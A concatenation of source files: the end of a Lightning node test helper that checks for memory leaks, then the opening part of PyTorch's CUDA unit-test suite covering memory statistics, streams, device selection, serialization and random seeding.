leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
test_cuda.py
|
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_c >= last_c
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with a end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when try to allocate more than half memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes an 0.1 second spin to stream so if the copy is non blocking,
# stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
